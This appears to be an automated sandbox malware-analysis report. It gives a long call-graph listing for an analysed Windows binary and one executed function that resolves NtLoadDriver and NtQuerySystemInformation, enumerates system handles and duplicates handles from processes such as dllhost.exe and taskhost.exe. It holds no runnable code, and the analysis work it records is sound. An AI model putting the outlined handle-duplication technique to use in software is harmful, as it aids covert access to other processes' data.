40833->40814 40834->40814 40835->40814 40836->40815 40837->40815 40838->40805 40839->40813 40840->40826 40841->40826 40861 441939 40886 441247 40861->40886 40864 4418ea 40865 441897 40867 4418e2 40865->40867 40870 442bd4 40865->40870 40867->40864 40889 4414a9 12 API calls 40867->40889 40870->40864 40890 441409 memset 40870->40890 40871 4308a4 40872 4308bc 40871->40872 40881 4308e4 40871->40881 40891 42c0c8 147 API calls 40872->40891 40875 430931 40875->40865 40876 4308d3 40877 4308e8 40876->40877 40878 4308d8 40876->40878 40892 42b896 memset 40877->40892 40896 4169a7 11 API calls 40878->40896 40898 42b896 memset 40881->40898 40882 4308f3 40893 42bbbe 40882->40893 40884 4308ff 40897 415c23 memcpy 40884->40897 40887 42b63e 14 API calls 40886->40887 40888 441259 40887->40888 40888->40864 40888->40865 40888->40871 40889->40864 40890->40870 40891->40876 40892->40882 40899 42b9bd 40893->40899 40896->40881 40897->40881 40898->40875 40900 42b9d2 40899->40900 40914 42bb72 40899->40914 40901 42ba5a memcpy 40900->40901 40902 42ba69 memcpy memset 40900->40902 40900->40914 40903 42bab6 40901->40903 40902->40903 40905 42bad5 memcpy 40903->40905 40906 42baef 40903->40906 40905->40906 40907 42bb15 40906->40907 40909 42bb1a 40906->40909 40910 42bb0a 40906->40910 40908 42bb86 40907->40908 40915 42bb37 40907->40915 40913 42b9bd memcpy 40908->40913 40908->40914 40922 42bbd5 memcpy memcpy memcpy memset memcpy 40909->40922 40921 42be4c memcpy memcpy memcpy memset memcpy 40910->40921 40916 42bba0 40913->40916 40914->40884 40915->40914 40917 42b9bd memcpy 40915->40917 40918 42b9bd memcpy 40916->40918 40919 42bb5e 40917->40919 40918->40914 40920 42b9bd memcpy 40919->40920 40920->40914 40921->40907 40922->40907 40923 41493c EnumResourceNamesW 37681 4287c1 37682 4287d2 37681->37682 37683 429ac1 37681->37683 37684 428818 37682->37684 37685 42881f 37682->37685 37706 425711 37682->37706 37695 425ad6 37683->37695 37751 415c56 11 API calls 37683->37751 37718 42013a 37684->37718 37746 420244 97 API calls 37685->37746 37690 4260dd 37745 424251 120 API calls 37690->37745 37692 4259da 37744 416760 11 API calls 37692->37744 37698 422aeb memset memcpy memcpy 37698->37706 37699 429a4d 37700 429a66 37699->37700 37704 429a9b 37699->37704 37747 415c56 11 API calls 37700->37747 37702 4260a1 37743 415c56 11 API calls 37702->37743 37705 429a96 37704->37705 37749 416760 11 API calls 37704->37749 37750 424251 120 API calls 37705->37750 37706->37683 37706->37692 37706->37698 37706->37699 37706->37702 37714 4259c2 37706->37714 37717 425a38 37706->37717 37734 4227f0 memset memcpy 37706->37734 37735 422b84 15 API calls 37706->37735 37736 422b5d memset memcpy memcpy 37706->37736 37737 422640 13 API calls 37706->37737 37739 4241fc 11 API calls 37706->37739 37740 42413a 90 API calls 37706->37740 37709 429a7a 37748 416760 11 API calls 37709->37748 37714->37695 37738 415c56 11 API calls 37714->37738 37717->37714 37741 422640 13 API calls 37717->37741 37742 4226e0 12 API calls 37717->37742 37719 42014c 37718->37719 37722 420151 37718->37722 37761 41e466 97 API calls 37719->37761 37721 420162 37721->37706 37722->37721 37723 4201b3 37722->37723 37724 420229 37722->37724 37725 4201b8 37723->37725 37726 4201dc 37723->37726 37724->37721 37727 41fd5e 86 API calls 37724->37727 37752 41fbdb 37725->37752 37726->37721 37730 4201ff 37726->37730 37758 41fc4c 37726->37758 37727->37721 37730->37721 37733 42013a 97 API calls 37730->37733 37733->37721 37734->37706 37735->37706 37736->37706 37737->37706 37738->37692 37739->37706 37740->37706 37741->37717 37742->37717 37743->37692 37744->37690 37745->37695 37746->37706 37747->37709 37748->37705 37749->37705 37750->37683 37751->37692 37753 41fbf8 37752->37753 37756 41fbf1 37752->37756 37766 41ee26 37753->37766 37757 41fc39 37756->37757 37776 4446ce 11 API calls 37756->37776 37757->37721 37762 41fd5e 37757->37762 37759 41ee6b 86 API calls 37758->37759 37760 41fc5d 37759->37760 37760->37726 37761->37722 37764 41fd65 37762->37764 37763 41fdab 37763->37721 37764->37763 37765 41fbdb 86 API calls 37764->37765 37765->37764 37767 41ee41 37766->37767 37768 41ee32 37766->37768 37777 41edad 37767->37777 37780 4446ce 11 API calls 37768->37780 37771 41ee3c 37771->37756 37774 41ee58 37774->37771 37782 41ee6b 37774->37782 37776->37757 37786 41be52 37777->37786 37780->37771 37781 41eb85 11 API calls 37781->37774 37783 41ee70 37782->37783 37784 41ee78 37782->37784 37842 41bf99 86 API calls 37783->37842 37784->37771 37787 41be6f 37786->37787 37788 41be5f 37786->37788 37794 41be8c 37787->37794 37807 418c63 37787->37807 37821 4446ce 11 API calls 37788->37821 37791 41be69 37791->37771 37791->37781 37792 41bee7 37792->37791 37825 41a453 86 API calls 37792->37825 37794->37791 37794->37792 37795 41bf3a 37794->37795 37799 41bed1 37794->37799 37824 4446ce 11 API calls 37795->37824 37797 41bef0 37797->37792 37798 41bf01 37797->37798 37800 41bf24 memset 37798->37800 37802 41bf14 37798->37802 37822 418a6d memset memcpy memset 37798->37822 37799->37797 37801 41bee2 37799->37801 37800->37791 37811 41ac13 37801->37811 37823 41a223 memset memcpy memset 37802->37823 37806 41bf20 37806->37800 37810 418c72 37807->37810 37808 418c94 37808->37794 37809 418d51 memset memset 37809->37808 37810->37808 37810->37809 37812 41ac52 37811->37812 37813 41ac3f memset 37811->37813 37816 41ac6a 37812->37816 37826 41dc14 19 API calls 37812->37826 37814 41acd9 37813->37814 37814->37792 37818 41aca1 37816->37818 37827 41519d 37816->37827 37818->37814 37819 41acc0 memset 37818->37819 37820 41accd memcpy 37818->37820 37819->37814 37820->37814 37821->37791 37822->37802 37823->37806 37824->37792 37826->37816 37830 4175ed 37827->37830 37838 417570 SetFilePointer 37830->37838 37833 41760a ReadFile 37834 417637 37833->37834 37835 417627 GetLastError 37833->37835 37836 4151b3 37834->37836 37837 41763e memset 37834->37837 37835->37836 37836->37818 37837->37836 37839 4175b2 37838->37839 37840 41759c GetLastError 37838->37840 37839->37833 37839->37836 37840->37839 37841 4175a8 GetLastError 37840->37841 37841->37839 37842->37784 37843 417bc5 37845 417c61 37843->37845 37849 417bda 37843->37849 37844 417bf6 UnmapViewOfFile CloseHandle 37844->37844 37844->37849 37847 417c2c 37847->37849 37855 41851e 20 API calls 37847->37855 37849->37844 37849->37845 37849->37847 37850 4175b7 37849->37850 37851 4175d6 FindCloseChangeNotification 37850->37851 37852 4175c8 37851->37852 37853 4175df 37851->37853 37852->37853 37854 4175ce Sleep 37852->37854 37853->37849 37854->37851 37855->37847 37890 4415ea 37898 4304b2 37890->37898 37892 4415fe 37893 4418ea 37892->37893 37894 442bd4 37892->37894 37895 4418e2 37892->37895 37894->37893 37946 441409 memset 37894->37946 37895->37893 37945 4414a9 12 API calls 37895->37945 37947 43041c 12 API calls 37898->37947 37900 4304cd 37905 430557 37900->37905 37948 43034a 37900->37948 37902 4304f3 37902->37905 37952 430468 11 API calls 37902->37952 37904 430506 37904->37905 37906 43057b 37904->37906 37953 43817e 37904->37953 37905->37892 37958 415a91 37906->37958 37911 4305e4 37911->37905 37963 4328e4 12 API calls 37911->37963 37913 43052d 37913->37905 37913->37906 37916 430542 37913->37916 37915 4305fa 37917 430609 37915->37917 37964 423383 11 API calls 37915->37964 37916->37905 37957 4169a7 11 API calls 37916->37957 37965 423330 11 API calls 37917->37965 37920 430634 37966 423399 11 API calls 37920->37966 37922 430648 37967 4233ae 11 API calls 37922->37967 37924 43066b 37968 423330 11 API calls 37924->37968 37926 43067d 37969 4233ae 11 API calls 37926->37969 37928 430695 37970 423330 11 API calls 37928->37970 37930 4306d6 37972 423330 11 API calls 37930->37972 37931 4306a7 37931->37930 37933 4306c0 37931->37933 37971 4233ae 11 API calls 37933->37971 37934 4306d1 37973 430369 17 API calls 37934->37973 37937 4306f3 37974 423330 11 API calls 37937->37974 37939 430704 37975 423330 11 API calls 37939->37975 37941 430710 37976 423330 11 API calls 37941->37976 37943 43071e 37977 423383 11 API calls 37943->37977 37945->37893 37946->37894 37947->37900 37949 43034e 37948->37949 37951 430359 37948->37951 37978 415c23 memcpy 37949->37978 37951->37902 37952->37904 37954 438187 37953->37954 37955 438192 37953->37955 37979 4380f6 37954->37979 37955->37913 37957->37905 37959 415a9d 37958->37959 37960 415ab3 37959->37960 37961 415aa4 memset 37959->37961 37960->37905 37962 4397fd memset 37960->37962 37961->37960 37962->37911 37963->37915 37964->37917 37965->37920 37966->37922 37967->37924 37968->37926 37969->37928 37970->37931 37971->37934 37972->37934 37973->37937 37974->37939 37975->37941 37976->37943 37977->37905 37978->37951 37981 43811f 37979->37981 37980 438164 37980->37955 37981->37980 37984 437e5e 37981->37984 38007 4300e8 37981->38007 38015 437d3c 37984->38015 37986 437eb3 37986->37981 37987 437ea9 37987->37986 37992 437f22 37987->37992 38030 41f432 37987->38030 37990 437f06 38080 415c56 11 API calls 37990->38080 37994 437f7f 37992->37994 38081 432d4e 37992->38081 37993 437f95 38085 415c56 11 API calls 37993->38085 37994->37993 37997 43802b 37994->37997 38041 4165ff 37997->38041 38002 43806b 38003 438094 38002->38003 38086 42f50e 138 API calls 38002->38086 38005 437fa3 38003->38005 38006 4300e8 3 API calls 38003->38006 38005->37986 38087 41f638 104 API calls 38005->38087 38006->38005 38008 430128 38007->38008 38011 4300fa 38007->38011 38010 430196 memset 38008->38010 38012 4301bc 38010->38012 38014 4301de 38010->38014 38011->38008 38011->38014 38523 432f8c 38011->38523 38013 4301c9 memcpy 38012->38013 38012->38014 38013->38014 38014->37981 38016 437d69 38015->38016 38019 437d80 38015->38019 38100 437ccb 11 API calls 38016->38100 38018 437d76 38018->37987 38019->38018 38020 437da3 38019->38020 38022 437d90 38019->38022 38088 438460 38020->38088 38022->38018 38104 437ccb 11 API calls 38022->38104 38024 437de8 38103 424f26 123 API calls 38024->38103 38026 437dcb 38026->38024 38101 444283 13 API calls 38026->38101 38028 437dfc 38102 437ccb 11 API calls 38028->38102 38031 41f54d 38030->38031 38037 41f44f 38030->38037 38032 41f466 38031->38032 38298 41c635 memset memset 38031->38298 38032->37990 38032->37992 38037->38032 38039 41f50b 38037->38039 38269 41f1a5 38037->38269 38294 41c06f memcmp 38037->38294 38295 41f3b1 90 API calls 38037->38295 38296 41f398 86 API calls 38037->38296 38039->38031 38039->38032 38297 41c295 86 API calls 38039->38297 38042 4165a0 11 API calls 38041->38042 38043 41660d 38042->38043 38044 437371 38043->38044 38045 41703f 11 API calls 38044->38045 38046 437399 38045->38046 38047 43739d 38046->38047 38050 4373ac 38046->38050 38403 4446ea 11 API calls 38047->38403 38049 4373a7 38049->38002 38051 416935 16 API calls 38050->38051 38052 4373ca 38051->38052 38053 438460 134 API calls 38052->38053 38062 415a91 memset 38052->38062 38065 43758f 38052->38065 38077 437584 38052->38077 38079 437d3c 135 API calls 38052->38079 38385 4251c4 38052->38385 38404 425433 13 API calls 38052->38404 38405 425413 38052->38405 38412 42533e 38052->38412 38416 42538f 38052->38416 38420 42453e 123 API calls 38052->38420 38053->38052 38054 4375bc 38056 415c7d 16 API calls 38054->38056 38057 4375d2 38056->38057 38057->38049 38423 4442e6 38057->38423 38060 4375e2 38060->38049 38430 444283 13 API calls 38060->38430 38062->38052 38421 42453e 123 API calls 38065->38421 38068 4375f4 38071 437620 38068->38071 38072 43760b 38068->38072 38070 43759f 38073 416935 16 API calls 38070->38073 38075 416935 16 API calls 38071->38075 38431 444283 13 API calls 38072->38431 38073->38077 38075->38049 38077->38054 38422 42453e 123 API calls 38077->38422 38078 437612 memcpy 38078->38049 38079->38052 38080->37986 38082 432d65 38081->38082 38083 432d58 38081->38083 38082->37994 38522 432cc4 memset memset memcpy 38083->38522 38085->38005 38086->38003 38087->37986 38105 41703f 38088->38105 38090 43847a 38091 43848a 38090->38091 38092 43847e 38090->38092 38112 438270 38091->38112 38142 4446ea 11 API calls 38092->38142 38096 438488 38096->38026 38098 4384bb 38099 438270 134 API calls 38098->38099 38099->38096 38100->38018 38101->38028 38102->38024 38103->38018 38104->38018 38106 417044 38105->38106 38107 41705c 38105->38107 38111 417055 38106->38111 38144 416760 11 API calls 38106->38144 38108 417075 38107->38108 38145 41707a 38107->38145 38108->38090 38111->38090 38113 415a91 memset 38112->38113 38114 43828d 38113->38114 38115 438297 38114->38115 38116 438341 38114->38116 38118 4382d6 38114->38118 38117 415c7d 16 API calls 38115->38117 38151 44358f 38116->38151 38120 438458 38117->38120 38121 4382fb 38118->38121 38122 4382db 38118->38122 38120->38096 38143 424f26 123 API calls 38120->38143 38194 415c23 memcpy 38121->38194 38182 416935 38122->38182 38125 438305 38129 44358f 19 API calls 38125->38129 38132 438318 38125->38132 38126 4382e9 38190 415c7d 38126->38190 38128 438373 38131 438383 38128->38131 38133 4300e8 3 API calls 38128->38133 38129->38132 38135 4383cd 38131->38135 38195 415c23 memcpy 38131->38195 38132->38128 38177 43819e 38132->38177 38133->38131 38134 4383f5 38138 438404 38134->38138 38139 43841c 38134->38139 38135->38134 38196 42453e 123 API calls 38135->38196 38141 416935 16 API calls 38138->38141 38140 416935 16 API calls 38139->38140 38140->38115 38141->38115 38142->38096 38143->38098 38144->38111 38146 417085 38145->38146 38147 4170ab 38145->38147 38146->38147 38150 416760 11 API calls 38146->38150 38147->38106 38149 4170a4 38149->38106 38150->38149 38152 4435be 38151->38152 38153 443676 38152->38153 38158 4436ce 38152->38158 38161 44366c 38152->38161 38175 44360c 38152->38175 38197 442ff8 38152->38197 38154 443758 38153->38154 38157 442ff8 19 API calls 38153->38157 38160 443737 38153->38160 38166 443775 38154->38166 38206 441409 memset 38154->38206 38156 442ff8 19 API calls 38156->38154 38157->38160 38163 4165ff 11 API calls 38158->38163 38160->38156 38205 4169a7 11 API calls 38161->38205 38162 4437be 38167 4437de 38162->38167 38208 416760 11 API calls 38162->38208 38163->38153 38166->38162 38207 415c56 11 API calls 38166->38207 38169 443801 38167->38169 38209 42463b memset memcpy 38167->38209 38168 443826 38220 43bd08 memset 38168->38220 38169->38168 38210 43024d 38169->38210 38174 443837 38174->38175 38176 43024d memset 38174->38176 38175->38132 38176->38174 38178 438246 38177->38178 38180 4381ba 38177->38180 38178->38128 38179 41f432 110 API calls 38179->38180 38180->38178 38180->38179 38247 41f638 104 API calls 38180->38247 38183 41693e 38182->38183 38185 41698e 38182->38185 38186 41694c 38183->38186 38248 422fd1 memset 38183->38248 38185->38126 38186->38185 38249 4165a0 38186->38249 38191 415c81 38190->38191 38193 415c9c 38190->38193 38192 416935 16 API calls 38191->38192 38191->38193 38192->38193 38193->38115 38194->38125 38195->38135 38196->38134 38203 442ffe 38197->38203 38198 443094 38235 4414a9 12 API calls 38198->38235 38200 443092 38200->38152 38203->38198 38203->38200 38221 4414ff 38203->38221 38233 4169a7 11 API calls 38203->38233 38234 441325 memset 38203->38234 38205->38153 38206->38154 38207->38162 38208->38167 38209->38169 38215 43025c 38210->38215 38219 4302f9 38210->38219 38211 4302cd 38236 435ef3 38211->38236 38215->38211 38215->38219 38245 4172c8 memset 38215->38245 38217 4302dc 38246 4386af memset 38217->38246 38219->38168 38220->38174 38222 441539 38221->38222 38224 441547 38221->38224 38223 441575 38222->38223 38222->38224 38225 441582 38222->38225 38227 42fccf 18 API calls 38223->38227 38226 4418e2 38224->38226 38230 442bd4 38224->38230 38228 43275a 12 API calls 38225->38228 38229 4414a9 12 API calls 38226->38229 38231 4418ea 38226->38231 38227->38224 38228->38224 38229->38231 38230->38231 38232 441409 memset 38230->38232 38231->38203 38232->38230 38233->38203 38234->38203 38235->38200 38238 435f03 38236->38238 38240 4302d4 38236->38240 38237 435533 memset 38237->38238 38238->38237 38239 4172c8 memset 38238->38239 38238->38240 38239->38238 38241 4301e7 38240->38241 38242 43023c 38241->38242 38244 4301f5 38241->38244 38242->38217 38243 42b896 memset 38243->38244 38244->38242 38244->38243 38245->38215 38246->38219 38247->38180 38248->38186 38255 415cfe 38249->38255 38254 422b84 15 API calls 38254->38185 38260 415d23 38255->38260 38262 41628e 38255->38262 38256 4163ca 38257 416422 10 API calls 38256->38257 38257->38262 38258 416422 10 API calls 38258->38260 38259 416172 memset 38259->38260 38260->38256 38260->38258 38260->38259 38261 415cb9 10 API calls 38260->38261 38260->38262 38261->38260 38263 416520 38262->38263 38264 416527 38263->38264 38268 416574 38263->38268 38265 415700 10 API calls 38264->38265 38266 416544 38264->38266 38264->38268 38265->38266 38267 416561 memcpy 38266->38267 38266->38268 38267->38268 38268->38185 38268->38254 38299 41bc3b 38269->38299 38272 41edad 86 API calls 38273 41f1cb 38272->38273 38274 41f1f5 memcmp 38273->38274 38275 41f20e 38273->38275 38279 41f282 38273->38279 38274->38275 38276 41f21b memcmp 38275->38276 38275->38279 38277 41f326 38276->38277 38280 41f23d 38276->38280 38278 41ee6b 86 API calls 38277->38278 38277->38279 38278->38279 38279->38037 38280->38277 38281 41f28e memcmp 38280->38281 38323 41c8df 56 API calls 38280->38323 38281->38277 38282 41f2a9 38281->38282 38282->38277 38285 41f308 38282->38285 38286 41f2d8 38282->38286 38284 41f269 38284->38277 38287 41f287 38284->38287 38288 41f27a 38284->38288 38285->38277 38325 4446ce 11 API calls 38285->38325 38289 41ee6b 86 API calls 38286->38289 38287->38281 38290 41ee6b 86 API calls 38288->38290 38291 41f2e0 38289->38291 38290->38279 38324 41b1ca memset 38291->38324 38294->38037 38295->38037 38296->38037 38297->38031 38298->38032 38300 41bc54 38299->38300 38308 41be0b 38299->38308 38302 41bd61 38300->38302 38300->38308 38312 41bc8d 38300->38312 38326 41baf0 55 API calls 38300->38326 38304 41be45 38302->38304 38335 41a25f memset 38302->38335 38304->38272 38304->38279 38306 41be04 38333 41aee4 56 API calls 38306->38333 38308->38302 38334 41ae17 34 API calls 38308->38334 38309 41bd42 38309->38302 38309->38306 38310 41bdd8 memset 38309->38310 38311 41bdba 38309->38311 38313 41bde7 memcmp 38310->38313 38322 4175ed 6 API calls 38311->38322 38312->38302 38312->38309 38314 41bd18 38312->38314 38327 4151e3 38312->38327 38313->38306 38316 41bdfd 38313->38316 38314->38302 38314->38309 38331 41a9da 86 API calls 38314->38331 38315 41bdcc 38315->38302 38315->38313 38332 41a1b0 memset 38316->38332 38322->38315 38323->38284 38324->38279 38325->38277 38326->38312 38336 41837f 38327->38336 38330 444706 11 API calls 38330->38314 38331->38309 38332->38306 38333->38308 38334->38302 38335->38304 38337 4183c1 38336->38337 38338 4183ca 38336->38338 38383 418197 25 API calls 38337->38383 38341 4151f9 38338->38341 38357 418160 38338->38357 38341->38314 38341->38330 38342 4183e5 38342->38341 38366 41739b 38342->38366 38345 418444 CreateFileW 38347 418477 38345->38347 38346 41845f CreateFileA 38346->38347 38348 4184c2 memset 38347->38348 38349 41847e GetLastError ??3@YAXPAX 38347->38349 38369 418758 38348->38369 38350 4184b5 38349->38350 38351 418497 38349->38351 38384 444706 11 API calls 38350->38384 38353 41837f 49 API calls 38351->38353 38353->38341 38358 41739b GetVersionExW 38357->38358 38359 418165 38358->38359 38361 4173e4 MultiByteToWideChar malloc MultiByteToWideChar ??3@YAXPAX 38359->38361 38362 418178 38361->38362 38363 41817f 38362->38363 38364 41748f AreFileApisANSI WideCharToMultiByte malloc WideCharToMultiByte ??3@YAXPAX 38362->38364 38363->38342 38365 418188 ??3@YAXPAX 38364->38365 38365->38342 38367 4173d6 38366->38367 38368 4173ad GetVersionExW 38366->38368 38367->38345 38367->38346 38368->38367 38370 418680 43 API calls 38369->38370 38371 418782 38370->38371 38372 418506 ??3@YAXPAX 38371->38372 38373 418160 11 API calls 38371->38373 38372->38341 38374 418799 38373->38374 38374->38372 38375 41739b GetVersionExW 38374->38375 38376 4187a7 38375->38376 38377 4187da 38376->38377 38378 4187ad GetDiskFreeSpaceW 38376->38378 38380 4187ec GetDiskFreeSpaceA 38377->38380 38382 4187e8 38377->38382 38381 418800 ??3@YAXPAX 38378->38381 38380->38381 38381->38372 38382->38380 38383->38338 38384->38341 38432 424f07 38385->38432 38387 4251e4 38388 4251f7 38387->38388 38389 4251e8 38387->38389 38440 4250f8 38388->38440 38439 4446ea 11 API calls 38389->38439 38391 4251f2 38391->38052 38393 425209 38395 425249 38393->38395 38399 4250f8 127 API calls 38393->38399 38400 425287 38393->38400 38448 4384e9 135 API calls 38393->38448 38449 424f74 124 API calls 38393->38449 38394 415c7d 16 API calls 38394->38391 38395->38400 38450 424ff0 38395->38450 38399->38393 38400->38394 38401 425266 38401->38400 38453 415be9 memcpy 38401->38453 38403->38049 38404->38052 38406 42533e 16 API calls 38405->38406 38407 42541f 38406->38407 38408 424ff0 13 API calls 38407->38408 38409 425425 38408->38409 38410 42538f 16 API calls 38409->38410 38411 42542d 38410->38411 38411->38052 38413 425345 38412->38413 38414 425357 38412->38414 38413->38414 38415 416935 16 API calls 38413->38415 38414->38052 38415->38414 38417 425394 38416->38417 38418 42539e 38416->38418 38419 415c7d 16 API calls 38417->38419 38418->38052 38419->38418 38420->38052 38421->38070 38422->38054 38424 4442eb 38423->38424 38427 444303 38423->38427 38425 41707a 11 API calls 38424->38425 38426 4442f2 38425->38426 38426->38427 38521 4446ea 11 API calls 38426->38521 38427->38060 38429 444300 38429->38060 38430->38068 38431->38078 38433 424f1f 38432->38433 38434 424f0c 38432->38434 38455 424eea 11 API calls 38433->38455 38454 416760 11 API calls 38434->38454 38437 424f18 38437->38387 38438 424f24 38438->38387 38439->38391 38441 425108 38440->38441 38447 42510d 38440->38447 38488 424f74 124 API calls 38441->38488 38444 42516e 38446 415c7d 16 API calls 38444->38446 38445 425115 38445->38393 38446->38445 38447->38445 38456 42569b 38447->38456 38448->38393 38449->38393 38506 422f5c 38450->38506 38453->38400 38454->38437 38455->38438 38457 4256f1 38456->38457 38484 4259c2 38456->38484 38463 4259da 38457->38463 38467 422aeb memset memcpy memcpy 38457->38467 38468 429a4d 38457->38468 38472 4260a1 38457->38472 38482 429ac1 38457->38482 38457->38484 38487 425a38 38457->38487 38489 4227f0 memset memcpy 38457->38489 38490 422b84 15 API calls 38457->38490 38491 422b5d memset memcpy memcpy 38457->38491 38492 422640 13 API calls 38457->38492 38494 4241fc 11 API calls 38457->38494 38495 42413a 90 API calls 38457->38495 38462 4260dd 38500 424251 120 API calls 38462->38500 38499 416760 11 API calls 38463->38499 38467->38457 38469 429a66 38468->38469 38470 429a9b 38468->38470 38501 415c56 11 API calls 38469->38501 38474 429a96 38470->38474 38503 416760 11 API calls 38470->38503 38498 415c56 11 API calls 38472->38498 38504 424251 120 API calls 38474->38504 38477 429a7a 38502 416760 11 API calls 38477->38502 38483 425ad6 38482->38483 38505 415c56 11 API calls 38482->38505 38483->38444 38484->38483 38493 415c56 11 API calls 38484->38493 38487->38484 38496 422640 13 API calls 38487->38496 38497 4226e0 12 API calls 38487->38497 38488->38447 38489->38457 38490->38457 38491->38457 38492->38457 38493->38463 38494->38457 38495->38457 38496->38487 38497->38487 38498->38463 38499->38462 38500->38483 38501->38477 38502->38474 38503->38474 38504->38482 38505->38463 38507 422f66 38506->38507 38514 422fb6 38506->38514 38508 422f8b 38507->38508 38507->38514 38517 422693 13 API calls 38507->38517 38510 422f95 38508->38510 38511 422fb8 38508->38511 38516 422fab 38510->38516 38518 422640 13 API calls 38510->38518 38520 422726 12 API calls 38511->38520 38514->38401 38516->38514 38519 4226e0 12 API calls 38516->38519 38517->38508 38518->38516 38519->38514 38520->38514 38521->38429 38522->38082 38525 432fc6 38523->38525 38526 432fdd 38525->38526 38529 43bd08 memset 38525->38529 38527 43024d memset 38526->38527 38528 43300e 38526->38528 38527->38526 38528->38011 38529->38525 40493 4147f3 40496 414561 40493->40496 40495 414813 40497 41456d 40496->40497 40498 41457f GetPrivateProfileIntW 40496->40498 40501 4143f1 memset _itow WritePrivateProfileStringW 40497->40501 40498->40495 40500 41457a 40500->40495 40501->40500

                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                    Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                                                      • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                                                    • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                                                                                    • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                                                                                                                                                                                                    • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                                                                    • API String ID: 594330280-3398334509
